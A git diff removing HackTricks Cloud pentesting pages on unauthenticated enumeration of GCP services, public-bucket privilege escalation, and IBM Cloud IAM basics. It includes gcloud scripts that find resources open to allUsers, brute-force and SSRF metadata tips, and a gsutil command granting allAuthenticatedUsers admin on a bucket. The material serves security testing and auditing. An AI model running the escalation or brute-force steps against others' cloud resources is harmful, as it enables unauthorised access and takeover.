-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -## Cloud Functions - -More information about Cloud Functions can be found in: - -{% content-ref url="../gcp-services/gcp-cloud-functions-enum.md" %} -[gcp-cloud-functions-enum.md](../gcp-services/gcp-cloud-functions-enum.md) -{% endcontent-ref %} - -### Brute Force URls - -**Brute Force the URL format**: - -* `https://-.cloudfunctions.net/` - -It's easier if you know project names. - -Check this page for some tools to perform this brute force: - -{% content-ref url="./" %} -[.](./) -{% endcontent-ref %} - -### Enumerate Open Cloud Functions - -With the following code [taken from here](https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp_misc/-/blob/master/find_open_functions.sh) you can find Cloud Functions that permit unauthenticated invocations. - -```bash -#!/bin/bash - -############################ -# Run this tool to find Cloud Functions that permit unauthenticated invocations -# anywhere in your GCP organization. -# Enjoy! -############################ - -for proj in $(gcloud projects list --format="get(projectId)"); do - echo "[*] scraping project $proj" - - enabled=$(gcloud services list --project "$proj" | grep "Cloud Functions API") - - if [ -z "$enabled" ]; then - continue - fi - - - for func_region in $(gcloud functions list --quiet --project "$proj" --format="value[separator=','](NAME,REGION)"); do - # drop substring from first occurence of "," to end of string. - func="${func_region%%,*}" - # drop substring from start of string up to last occurence of "," - region="${func_region##*,}" - ACL="$(gcloud functions get-iam-policy "$func" --project "$proj" --region "$region")" - - all_users="$(echo "$ACL" | grep allUsers)" - all_auth="$(echo "$ACL" | grep allAuthenticatedUsers)" - - if [ -z "$all_users" ] - then - : - else - echo "[!] Open to all users: $proj: $func" - fi - - if [ -z "$all_auth" ] - then - : - else - echo "[!] 
Open to all authenticated users: $proj: $func" - fi - done -done -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-run-unauthenticated-enum.md b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-run-unauthenticated-enum.md
deleted file mode 100644
index fbb978d13..000000000
--- a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-run-unauthenticated-enum.md
+++ /dev/null
@@ -1,85 +0,0 @@
-# GCP - Cloud Run Unauthenticated Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -## Cloud Run - -For more information about Cloud Run check: - -{% content-ref url="../gcp-services/gcp-cloud-run-enum.md" %} -[gcp-cloud-run-enum.md](../gcp-services/gcp-cloud-run-enum.md) -{% endcontent-ref %} - -### Enumerate Open Cloud Run - -With the following code [taken from here](https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp_misc/-/blob/master/find_open_cloudrun.sh) you can find Cloud Run services that permit unauthenticated invocations. - -```bash -#!/bin/bash - -############################ -# Run this tool to find Cloud Run services that permit unauthenticated -# invocations anywhere in your GCP organization. -# Enjoy! -############################ - -for proj in $(gcloud projects list --format="get(projectId)"); do - echo "[*] scraping project $proj" - - enabled=$(gcloud services list --project "$proj" | grep "Cloud Run API") - - if [ -z "$enabled" ]; then - continue - fi - - - for run in $(gcloud run services list --platform managed --quiet --project $proj --format="get(name)"); do - ACL="$(gcloud run services get-iam-policy $run --platform managed --project $proj)" - - all_users="$(echo $ACL | grep allUsers)" - all_auth="$(echo $ACL | grep allAuthenticatedUsers)" - - if [ -z "$all_users" ] - then - : - else - echo "[!] Open to all users: $proj: $run" - fi - - if [ -z "$all_auth" ] - then - : - else - echo "[!] Open to all authenticated users: $proj: $run" - fi - done -done -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.md b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.md
deleted file mode 100644
index 1fa4e18a2..000000000
--- a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.md
+++ /dev/null
@@ -1,49 +0,0 @@
-# GCP - Cloud SQL Unauthenticated Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Cloud SQL
-
-For more infromation about Cloud SQL check:
-
-{% content-ref url="../gcp-services/gcp-cloud-sql-enum.md" %}
-[gcp-cloud-sql-enum.md](../gcp-services/gcp-cloud-sql-enum.md)
-{% endcontent-ref %}
-
-### Brute Force
-
-If you have **access to a Cloud SQL port** because all internet is permitted or for any other reason, you can try to brute force credentials.
-
-Check this page for **different tools to burte-force** different database technologies:
-
-{% embed url="https://book.hacktricks.xyz/generic-methodologies-and-resources/brute-force" %}
-
-Remember that with some privileges it's possible to **list all the database users** via GCP API.
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.md b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.md
deleted file mode 100644
index 200dd2333..000000000
--- a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.md
+++ /dev/null
@@ -1,49 +0,0 @@
-# GCP - Compute Unauthenticated Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Compute
-
-For more information about Compute and VPC (Networking) check:
-
-{% content-ref url="../gcp-services/gcp-compute-instances-enum/" %}
-[gcp-compute-instances-enum](../gcp-services/gcp-compute-instances-enum/)
-{% endcontent-ref %}
-
-### SSRF - Server Side Request Forgery
-
-If a web is **vulnerable to SSRF** and it's possible to **add the metadata header**, an attacker could abuse it to access the SA OAuth token from the metadata endpoint. For more info about SSRF check:
-
-{% embed url="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery" %}
-
-### Vulnerable exposed services
-
-If a GCP instance has a vulnerable exposed service an attacker could abuse it to compromise it.
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-source-repositories-unauthenticated-enum.md b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-source-repositories-unauthenticated-enum.md
deleted file mode 100644
index 143207a71..000000000
--- a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-source-repositories-unauthenticated-enum.md
+++ /dev/null
@@ -1,46 +0,0 @@
-# GCP - Source Repositories Unauthenticated Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Source Repositories
-
-For more information about Source Repositories check:
-
-{% content-ref url="../gcp-services/gcp-source-repositories-enum.md" %}
-[gcp-source-repositories-enum.md](../gcp-services/gcp-source-repositories-enum.md)
-{% endcontent-ref %}
-
-### Compromise External Repository
-
-If an external repository is being used via Source Repositories an attacker could add his malicious code to the repository and:
-
-* If someone uses Cloud Shell to develop the repository it could be compromised
-* if this source repository is used by other GCP services, they could get compromised
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/README.md b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/README.md
deleted file mode 100644
index 39f682aa7..000000000
--- a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/README.md
+++ /dev/null
@@ -1,99 +0,0 @@
-# GCP - Storage Unauthenticated Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -## Storage - -For more information about Storage check: - -{% content-ref url="../../gcp-services/gcp-storage-enum.md" %} -[gcp-storage-enum.md](../../gcp-services/gcp-storage-enum.md) -{% endcontent-ref %} - -### Public Bucket Brute Force - -The **format of an URL** to access a bucket is **`https://storage.googleapis.com/`.** - -The following tools can be used to generate variations of the name given and search for miss-configured buckets with that names: - -* [https://github.com/RhinoSecurityLabs/GCPBucketBrute](https://github.com/RhinoSecurityLabs/GCPBucketBrute) - -**Also the tools** mentioned in: - -{% content-ref url="../" %} -[..](../) -{% endcontent-ref %} - -If you find that you can **access a bucket** you might be able to **escalate even further**, check: - -{% content-ref url="gcp-public-buckets-privilege-escalation.md" %} -[gcp-public-buckets-privilege-escalation.md](gcp-public-buckets-privilege-escalation.md) -{% endcontent-ref %} - -### Search Open Buckets in Current Account - -With the following script [gathered from here](https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp_misc/-/blob/master/find_open_buckets.sh) you can find all the open buckets: - -```bash -#!/bin/bash - -############################ -# Run this tool to find buckets that are open to the public anywhere -# in your GCP organization. -# -# Enjoy! -############################ - -for proj in $(gcloud projects list --format="get(projectId)"); do - echo "[*] scraping project $proj" - for bucket in $(gsutil ls -p $proj); do - echo " $bucket" - ACL="$(gsutil iam get $bucket)" - - all_users="$(echo $ACL | grep allUsers)" - all_auth="$(echo $ACL | grep allAuthenticatedUsers)" - - if [ -z "$all_users" ] - then - : - else - echo "[!] Open to all users: $bucket" - fi - - if [ -z "$all_auth" ] - then - : - else - echo "[!] 
Open to all authenticated users: $bucket" - fi - done -done -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.md b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.md
deleted file mode 100644
index bd3d71db2..000000000
--- a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.md
+++ /dev/null
@@ -1,57 +0,0 @@
-# GCP - Public Buckets Privilege Escalation
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -## Buckets Privilege Escalation - -If the bucket policy allowed either “allUsers” or “allAuthenticatedUsers” to **write to their bucket policy** (the **storage.buckets.setIamPolicy** permission)**,** then anyone can modify the bucket policy and grant himself full access. - -### Check Permissions - -There are 2 ways to check the permissions over a bucket. The first one is to ask for them by making a request to `https://www.googleapis.com/storage/v1/b/BUCKET_NAME/iam` or running `gsutil iam get gs://BUCKET_NAME`. - -However, if your user (potentially belonging to allUsers or allAuthenticatedUsers") doesn't have permissions to read the iam policy of the bucket (storage.buckets.getIamPolicy), that won't work. - -The other option which will always work is to use the testPermissions endpoint of the bucket to figure out if you have the specified permission, for example accessing: `https://www.googleapis.com/storage/v1/b/BUCKET_NAME/iam/testPermissions?permissions=storage.buckets.delete&permissions=storage.buckets.get&permissions=storage.buckets.getIamPolicy&permissions=storage.buckets.setIamPolicy&permissions=storage.buckets.update&permissions=storage.objects.create&permissions=storage.objects.delete&permissions=storage.objects.get&permissions=storage.objects.list&permissions=storage.objects.update` - -### Escalating - -In order to grant `Storage Admin` to `allAuthenticatedUsers` it's possible to run: - -```bash -gsutil iam ch allAuthenticatedUsers:admin gs://BUCKET_NAME -``` - -Another attack would be to **remove the bucket an d recreate it in your account to steal th ownership**. 
-
-## References
-
-* [https://rhinosecuritylabs.com/gcp/google-cloud-platform-gcp-bucket-enumeration/](https://rhinosecuritylabs.com/gcp/google-cloud-platform-gcp-bucket-enumeration/)
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/ibm-cloud-pentesting/README.md b/pentesting-cloud/ibm-cloud-pentesting/README.md
deleted file mode 100644
index caf2dee60..000000000
--- a/pentesting-cloud/ibm-cloud-pentesting/README.md
+++ /dev/null
@@ -1,62 +0,0 @@
-# IBM Cloud Pentesting
-
-## IBM Cloud Pentesting
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -### What is IBM cloud? (By chatGPT) - -IBM Cloud, a cloud computing platform by IBM, offers a variety of cloud services such as infrastructure as a service (IaaS), platform as a service (PaaS), and software as a service (SaaS). It enables clients to deploy and manage applications, handle data storage and analysis, and operate virtual machines in the cloud. - -When compared with Amazon Web Services (AWS), IBM Cloud showcases certain distinct features and approaches: - -1. **Focus**: IBM Cloud primarily caters to enterprise clients, providing a suite of services designed for their specific needs, including enhanced security and compliance measures. In contrast, AWS presents a broad spectrum of cloud services for a diverse clientele. -2. **Hybrid Cloud Solutions**: Both IBM Cloud and AWS offer hybrid cloud services, allowing integration of on-premises infrastructure with their cloud services. However, the methodology and services provided by each differ. -3. **Artificial Intelligence and Machine Learning (AI & ML)**: IBM Cloud is particularly noted for its extensive and integrated services in AI and ML. AWS also offers AI and ML services, but IBM's solutions are considered more comprehensive and deeply embedded within its cloud platform. -4. **Industry-Specific Solutions**: IBM Cloud is recognized for its focus on particular industries like financial services, healthcare, and government, offering bespoke solutions. AWS caters to a wide array of industries but might not have the same depth in industry-specific solutions as IBM Cloud. 
- -#### Basic Information - -For some basic information about IAM and hierarchi check: - -{% content-ref url="ibm-basic-information.md" %} -[ibm-basic-information.md](ibm-basic-information.md) -{% endcontent-ref %} - -### SSRF - -Learn how you can access the medata endpoint of IBM in the following page: - -{% embed url="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#2af0" %} - -## References - -* [https://redresscompliance.com/navigating-the-ibm-cloud-a-comprehensive-overview/#:\~:text=IBM%20Cloud%20is%3A,%2C%20networking%2C%20and%20database%20management.](https://redresscompliance.com/navigating-the-ibm-cloud-a-comprehensive-overview/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/ibm-cloud-pentesting/ibm-basic-information.md b/pentesting-cloud/ibm-cloud-pentesting/ibm-basic-information.md deleted file mode 100644 index 034d4fa02..000000000 --- a/pentesting-cloud/ibm-cloud-pentesting/ibm-basic-information.md +++ /dev/null @@ -1,99 +0,0 @@ -# IBM - Basic Information - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Hierarchy - -IBM Cloud resource model ([from the docs](https://www.ibm.com/blog/announcement/introducing-ibm-cloud-enterprises/)): - -
- -Recommended way to divide projects: - -
- -## IAM - -
- -### Users - -Users have an **email** assigned to them. They can access the **IBM console** and also **generate API keys** to use their permissions programatically.\ -**Permissions** can be granted **directly** to the user with an access policy or via an **access group**. - -### Trusted Profiles - -These are **like the Roles of AWS** or service accounts from GCP. It's possible to **assign them to VM** instances and access their **credentials via metadata**, or even **allow Identity Providers** to use them in order to authenticate users from external platforms.\ -**Permissions** can be granted **directly** to the trusted profile with an access policy or via an **access group**. - -### Service IDs - -This is another option to allow applications to **interact with IBM cloud** and perform actions. In this case, instead of assign it to a VM or Identity Provider an **API Key can be used** to interact with IBM in a **programatic** way.\ -**Permissions** can be granted **directly** to the service id with an access policy or via an **access group**. - -### Identity Providers - -External **Identity Providers** can be configured to **access IBM cloud** resources from external platforms by accessing **trusting Trusted Profiles**. - -### Access Groups - -In the same access group **several users, trusted profiles & service ids** can be present. Each principal in the access group will **inherit the access group permissions**.\ -**Permissions** can be granted **directly** to the trusted profile with an access policy.\ -An **access group cannot be a member** of another access group. - -### Roles - -A role is a **set of granular permissions**. **A role** is dedicated to **a service**, meaning that it will only contain permissions of that service.\ -**Each service** of IAM will already have some **possible roles** to choose from to **grant a principal access to that service**: **Viewer, Operator, Editor, Administrator** (although there could be more). 
- -Role permissions are given via access policies to principals, so if you need to give for example a **combination of permissions** of a service of **Viewer** and **Administrator**, instead of giving those 2 (and overprivilege a principal), you can **create a new role** for the service and give that new role the **granular permissions you need**. - -### Access Policies - -Access policies allows to **attach 1 or more roles of 1 service to 1 principal**.\ -When creating the policy you need to choose: - -* The **service** where permissions will be granted -* **Affected resources** -* Service & Platform **access** that will be granted - * These indicate the **permissions** that will be given to the principal to perform actions. If any **custom role** is created in the service you will also be able to choose it here. -* **Conditions** (if any) to grant the permissions - -{% hint style="info" %} -To grant access to several services to a user, you can generate several access policies -{% endhint %} - -
- -## References - -* [https://www.ibm.com/cloud/blog/announcements/introducing-ibm-cloud-enterprises](https://www.ibm.com/cloud/blog/announcements/introducing-ibm-cloud-enterprises) -* [https://cloud.ibm.com/docs/account?topic=account-iamoverview](https://cloud.ibm.com/docs/account?topic=account-iamoverview) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/kubernetes-security/README.md b/pentesting-cloud/kubernetes-security/README.md deleted file mode 100644 index c7b6d358f..000000000 --- a/pentesting-cloud/kubernetes-security/README.md +++ /dev/null @@ -1,106 +0,0 @@ -# Kubernetes Pentesting - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
